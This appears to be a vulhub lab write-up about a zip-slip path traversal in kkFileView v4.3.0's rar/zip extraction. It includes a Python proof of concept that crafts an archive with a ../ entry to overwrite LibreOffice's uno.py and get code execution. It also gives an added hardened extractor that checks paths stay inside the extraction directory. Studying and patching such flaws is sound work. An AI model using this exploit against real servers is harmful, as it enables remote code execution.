Debugging environment

The environment is the vulhub one; the source code is version v4.3.0, see https://github.com/kekingcn/kkFileView/archive/refs/tags/v4.3.0.tar.gz

Vulnerability analysis

cn.keking.service.CompressFileReader#unRar implements its own extraction logic. The output file for each archive entry is opened like this:

    OutputStream out = new FileOutputStream( extractPath+ folderName + "_" + File.separator + str[0], true);

The write path is built by plain string concatenation of the extraction directory and the entry name taken from the archive (str[0]), with no normalisation and no check that the result stays under extractPath. An entry name containing ../ sequences therefore climbs out of the extraction directory, which turns the extractor into an arbitrary file write.

When kkFileView converts an odt file to pdf it invokes the system LibreOffice, and that process loads the uno.py module from the LibreOffice program directory. The arbitrary write can be used to overwrite that py file with attacker-controlled Python, which then runs the next time a conversion is triggered.

    import zipfile

    if __name__ == "__main__":
        try:
            # Harmless entry, so the archive still looks like a normal upload.
            binary1 = b'vulhub'
            # Payload written over uno.py; runs when LibreOffice next imports it.
            binary2 = b"import os\nos.system('touch /tmp/success')\n"
            zipFile = zipfile.ZipFile("abc.zip", "a", zipfile.ZIP_DEFLATED)
            # info = zipfile.ZipInfo("test.zip")
            zipFile.writestr("abc.txt", binary1)
            # Entry name with enough ../ to reach / from any extraction depth,
            # then descends into the LibreOffice program directory.
            zipFile.writestr("../../../../../../../../../../../../../../../../../../../opt/libreoffice7.5/program/uno.py", binary2)
            zipFile.close()
        except IOError as e:
            raise e
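To make the root cause concrete, the following is an added example (not code from the page or from kkFileView) that builds an archive with the same two entries as the PoC above in memory, shows where the concatenated path actually lands, and extracts it through a hardened variant that resolves every target path and refuses anything outside the extraction directory. The extraction directory name /tmp/kkfile/abc_ and all helper names are assumptions for illustration.

```python
import io
import os
import tempfile
import zipfile

# Constructed sample archive, mirroring the PoC: one benign entry and one
# whose name climbs out of the extraction directory.
TRAVERSAL_NAME = ("../../../../../../../../../../../../../../../../../../../"
                  "opt/libreoffice7.5/program/uno.py")


def build_sample_zip() -> bytes:
    """Return the bytes of a zip containing abc.txt and the traversal entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("abc.txt", b"vulhub")
        zf.writestr(TRAVERSAL_NAME, b"import os\nos.system('touch /tmp/success')\n")
    return buf.getvalue()


def naive_target(extract_dir: str, entry_name: str) -> str:
    """Vulnerable pattern: entry name concatenated onto the directory.

    normpath only shows where the OS would actually open the file; the
    vulnerable code does no containment check at all.
    """
    return os.path.normpath(extract_dir + os.sep + entry_name)


def safe_target(extract_dir: str, entry_name: str) -> str:
    """Hardened pattern: resolve both paths and require containment."""
    root = os.path.realpath(extract_dir)
    target = os.path.realpath(os.path.join(root, entry_name))
    if os.path.commonpath([root, target]) != root:
        raise ValueError(f"zip entry escapes extraction dir: {entry_name!r}")
    return target


def classify_entries(zip_bytes: bytes, extract_dir: str) -> dict:
    """Map each entry name to (path the naive code would write, passes safe check)."""
    result = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            naive = naive_target(extract_dir, info.filename)
            try:
                safe_target(extract_dir, info.filename)
                allowed = True
            except ValueError:
                allowed = False
            result[info.filename] = (naive, allowed)
    return result


def safe_extract(zip_bytes: bytes, extract_dir: str) -> list:
    """Extract only entries that stay inside extract_dir; return written paths."""
    written = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            try:
                target = safe_target(extract_dir, info.filename)
            except ValueError:
                continue  # hostile entry: skip instead of writing outside the root
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(target)
    return written


def run_demo() -> list:
    """Extract the constructed archive into a fresh temp dir; return relative paths written."""
    extract_dir = tempfile.mkdtemp(prefix="kkfileview_")
    written = safe_extract(build_sample_zip(), extract_dir)
    return [os.path.relpath(p, os.path.realpath(extract_dir)) for p in written]


if __name__ == "__main__":
    for name, (naive, allowed) in classify_entries(build_sample_zip(), "/tmp/kkfile/abc_").items():
        print(f"{name[:40]:40} -> {naive}  allowed={allowed}")
    print("written by hardened extractor:", run_demo())
```

The containment test compares real paths, so it also rejects entries that would escape through a symlink already present under the extraction directory, not only textual ../ sequences.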

Reference

https://xz.aliyun.com/t/14315

https://forum.butian.net/share/2938